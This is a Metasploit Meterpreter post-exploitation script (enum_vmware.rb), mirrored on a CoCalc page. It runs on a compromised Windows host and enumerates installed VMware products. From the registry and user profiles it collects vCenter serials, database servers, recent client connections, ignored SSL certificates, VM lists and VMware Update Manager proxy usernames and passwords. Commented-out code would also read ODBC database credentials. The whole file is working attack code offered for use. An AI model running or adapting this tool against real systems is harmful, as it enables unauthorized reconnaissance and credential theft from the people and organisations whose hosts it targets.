CoCalc -- enum_vmware.rb

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/enum_vmware.rb
Views: ¹¹⁷⁶⁶
1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
#-------------------------------------------------------------------------------
10
################## Variable Declarations ##################
11
@client = client
12

13
opts = Rex::Parser::Arguments.new(
14
  "-h" => [ false,"Help menu." ]
15
)
16

17
opts.parse(args) { |opt, idx, val|
18
  case opt
19
  when "-h"
20
    print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
21
    print_line("USAGE: run vmware_enum")
22
    print_line(opts.usage)
23
    raise Rex::Script::Completed
24
  end
25
}
26

27
def check_prods()
28
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
29
  sfmsvals = key.enum_key
30
  print_status("The Following Products are installed on this host:")
31
  sfmsvals.each do |p|
32
    print_status("\t#{p}")
33
  end
34
  return sfmsvals
35
end
36

37
def check_vmsoft
38
  installed = false
39
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
40
  sfmsvals = key.enum_key
41
  if sfmsvals.include?("VMware, Inc.")
42
    print_status("VMware Products are Installed in Host")
43
    installed = true
44
  else
45
    print_error("No VMware Products where found in this Host.")
46
  end
47
  key.close
48
  return installed
49
end
50

51
def enum_vcenter
52
  print_status("Information about Virtual Center:")
53
  vc_dbuser = nil
54
  vc_dbencpass = nil
55
  vc_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","InstalledVersion")
56
  vc_serial = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","Serial")
57
  vc_dbinstance = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBInstanceName")
58
  vc_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBServerType")
59
  vc_tomcatver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\Tomcat","Version")
60
  vc_type = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","GroupType")
61
  vc_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","1")
62
  vc_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","4")
63
  #	vc_odctrustcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname}","TrustedConnection")
64
  #	print_line("*")
65
  #	if vc_odctrustcon.to_i != 1
66
  #		vc_dbuser = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","2")
67
  #		print_line("*")
68
  #		vc_dbencpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","3")
69
  #		print_line("*")
70
  #	end
71
  vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Database")
72
  vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Server")
73
  print_status("\tVersion: #{vc_version}")
74
  print_status("\tSerial: #{vc_serial}")
75
  print_status("\tvCenter Type: #{vc_type}")
76
  print_status("\tTomcat Version: #{vc_tomcatver}")
77
  print_status("\tDatabase Instance: #{vc_dbinstance}")
78
  print_status("\tDatabase Type: #{vc_dbtype}")
79
  print_status("\tDatabase Name: #{vc_dbname}")
80
  print_status("\tDatabase Server: #{vc_dbserver}")
81
  print_status("\tODBC Name: #{vc_odbcname}")
82
  print_status("\tODBC Type: #{vc_odbctype}")
83
  #	if vc_odctrustcon.to_i != 1
84
  #		print_status("\tODBC Username: #{vc_dbuser}")
85
  #		print_status("\tODBC Password: #{vc_dbencpass}")
86
  #	end
87
end
88

89
def enum_viclient
90
  print_status("Information about VMware VI Client:")
91
  vi_pluggins = nil
92
  begin
93
    vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0","InstalledVersion")
94
    vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
95
  rescue
96
  end
97
  print_status("\tVersion: #{vi_version}")
98
  if vi_pluggins
99
    vi_pluggins.each do |pi|
100
      if pi=~ /Converter/
101
        print_status("\tPlugin: VMware Converter")
102
      elsif pi =~/UM/
103
        print_status("\tPlugin: VMware Update Manager")
104
      else
105
        print_status("\tPlugin: #{pi}")
106
      end
107
    end
108
  end
109

110
  if not is_system?
111
    recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
112
    print_status("Recent VI Client Connections:")
113
    recentconns.each do |c|
114
      print_status("\t#{c}")
115
    end
116
    ignore_ssl = registry_enumkeys("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
117
    if ignore_ssl.length > 0
118
      print_status("\tIgnored SSL Certs for")
119
      ignore_ssl.each do |issl|
120
        ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
121
        print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
122
      end
123

124
    end
125
  else
126
    user_sid = []
127
    key = "HKU\\"
128
    root_key, base_key = @client.sys.registry.splitkey(key)
129
    open_key = @client.sys.registry.open_key(root_key, base_key)
130
    keys = open_key.enum_key
131
    keys.each do |k|
132
      user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
133
    end
134
    user_sid.each do |us|
135
      begin
136
      enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment","USERNAME")
137
      print_status("\tRecent VI Client Connections for #{enumed_user}:")
138
      recentconns = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
139
      recentconns.each do |c|
140
        print_status("\t#{c}")
141
      end
142
      ignore_ssl = registry_enumkeys("HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
143
      if ignore_ssl.length > 0
144
        print_status("\tIgnored SSL Certs for #{enumed_user}:")
145
        ignore_ssl.each do |issl|
146
          ssl_key = registry_getvaldata("HCU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
147
          print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
148
        end
149

150
      end
151
      rescue
152
        print_status("\tUser appears to have not used the software.")
153
      end
154
    end
155
  end
156
end
157

158
def enum_vum
159
  print_status("Information about VMware Update Manager:")
160
  begin
161
    vum_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","InstalledVersion")
162
    vum_server = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VUMServer")
163
    vum_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DBServerType")
164
    vum_direct2web = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DirectWebAccess")
165
    vum_useproxy = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","UseProxy")
166
    vum_proxyserver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyServer")
167
    vum_proxyport = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPort")
168
    vum_proxyuser = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyUserName")
169
    vum_proxypass = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPassword")
170
    vum_vcentersrv = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCServer")
171
    vum_vcenterusr = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCUserName")
172
    vum_patchstore = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","PatchStore")
173
    vum_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","1")
174
    vum_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","4")
175
    vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Database")
176
    vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Server")
177
    #		vum_trustedcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","TrustedConnection")
178
    #		if vum_trustedcon.to_i != 1
179
    #			vum_odbcusename = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","2")
180
    #			vum_odbcpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","3")
181
    #		end
182
    print_status("\tVersion: #{vum_version}")
183
    print_status("\tServer: #{vum_server}")
184
    print_status("\tPatch Store: #{vum_patchstore}")
185
    print_status("\tDatabse Type: #{vum_dbtype}")
186
    print_status("\tUses Proxy: #{vum_useproxy}")
187
    print_status("\tProxy User: #{vum_proxyuser}")
188
    print_status("\tProxy Password: #{vum_proxypass}")
189
    print_status("\tVirtual Center: #{vum_vcentersrv}")
190
    print_status("\tVirtual Center User: #{vum_vcenterusr}")
191
    print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
192
    print_status("\tDatabase Name: #{vum_dbname}")
193
    print_status("\tDatabase Server: #{vum_dbserver}")
194
    print_status("\tODBC Name: #{vum_odbcname}")
195
    print_status("\tODBC Type: #{vum_odbctype}")
196
    #		print_status("\t ODBC Trusted: #{vum_trustedcon}")
197
    #		if vum_trustedcon.to_i != 1
198
    #			print_status("\tODBC Username: #{vum_odbcusename}")
199
    #			print_status("\tODBC Password: #{vum_odbcpass}")
200
    #		end
201
  rescue ::Exception => e
202
    print_status("Error: #{e.class} #{e}")
203
  end
204

205
end
206

207
def enum_vdm
208
  print_status("Information about VMware VDM Broker:")
209
  vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
210
  print_status("\tVersion: #{vdm_version}")
211
end
212

213
def enum_powercli
214
  print_status("Information about PowerCLI:")
215
  pcli_version =  registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
216
  pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
217
  begin
218
    pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
219
  rescue
220
    pcli_poweshell_policy = "Restricted"
221
  end
222
  print_status("\tVersion: #{pcli_version}")
223
  print_status("\tInstalled Pat: #{pcli_install_path}")
224
  print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
225
end
226

227
#Function to enumerate the users if running as SYSTEM
228
def enum_users
229
  os = @client.sys.config.sysinfo['OS']
230
  users = []
231
  path4users = ""
232
  sysdrv = @client.sys.config.getenv('SystemDrive')
233

234
  if os =~ /7|Vista|2008/
235
    path4users = sysdrv + "\\users\\"
236
    profilepath = "\\AppData\\Local\\VMware\\"
237
  else
238
    path4users = sysdrv + "\\Documents and Settings\\"
239
    profilepath = "\\Application Data\\VMware\\"
240
  end
241

242
  if @client.sys.config.is_system?
243
    print_status("Running as SYSTEM extracting user list..")
244
    @client.fs.dir.foreach(path4users) do |u|
245
      userinfo = {}
246
      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
247
      userinfo['username'] = u
248
      userinfo['userappdata'] = path4users + u + profilepath
249
      users << userinfo
250
    end
251
  else
252
    userinfo = {}
253
    uservar = @client.sys.config.getenv('USERNAME')
254
    userinfo['username'] = uservar
255
    userinfo['userappdata'] = path4users + uservar + profilepath
256
    users << userinfo
257
  end
258
  return users
259
end
260
def enum_vihosupdt
261
  hosts = []
262
  print_status("Information about VMware vSphere Host Update Utility:")
263
  enum_users.each do |u|
264
    print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
265
    begin
266
    @client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
267
      next if vmdir =~ /^(\.|\.\.)$/
268
      print_status("\t#{vmdir}")
269
    end
270
    rescue
271
    end
272
  end
273
end
274

275
def enum_vmwarewrk
276
  config = ""
277
  name = ""
278
  print_status("Enumerating VMware Workstation VM's:")
279
  fav_file = ""
280
  enum_users.each do |u|
281
    print_status("\tVM's for user #{u['username']}:")
282
    path = u['userappdata'].gsub(/Local/,"Roaming")
283
    account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
284
    until account_file.eof?
285
      fav_file << account_file.read
286
    end
287
  end
288
  fav_file.each_line do |l|
289

290
    if l =~ /config/
291
      print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
292
    end
293
    if l =~ /Name/
294
      print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
295
      print_status("")
296
    end
297
  end
298
end
299
if client.platform == 'windows'
300
  if check_vmsoft
301
    vmware_products = check_prods()
302
    if vmware_products.include?("VMware VirtualCenter")
303
      enum_vcenter
304
    end
305
    if vmware_products.include?("VMware Virtual Infrastructure Client")
306
      enum_viclient
307
    end
308
    if vmware_products.include?("VMware Update Manager")
309
      enum_vum
310
    end
311

312
    if vmware_products.include?("VMware VDM")
313
      enum_vdm
314
    end
315
    if vmware_products.include?("VMware vSphere PowerCLI")
316
      enum_powercli
317
    end
318
    if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
319
      enum_vihosupdt
320
    end
321
    if vmware_products.include?("VMware Workstation")
322
      enum_vmwarewrk
323
    end
324
  else
325
    print_status("No VMware Products appear to be installed in this host")
326
  end
327
else
328
  print_error("This version of Meterpreter is not supported with this Script!")
329
  raise Rex::Script::Completed
330
end
331

332
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
